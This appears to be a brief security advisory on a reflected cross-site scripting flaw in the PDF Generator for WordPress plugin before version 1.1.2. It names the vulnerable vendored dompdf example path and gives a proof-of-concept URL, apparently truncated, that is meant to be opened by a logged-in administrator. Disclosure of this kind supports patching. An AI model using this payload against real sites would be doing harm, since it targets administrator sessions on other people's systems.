PDF Generator for WordPress < 1.1.2 - Reflected XSS

The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin

PoC

Make a logged in admin open the following URL: https://example.com/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=">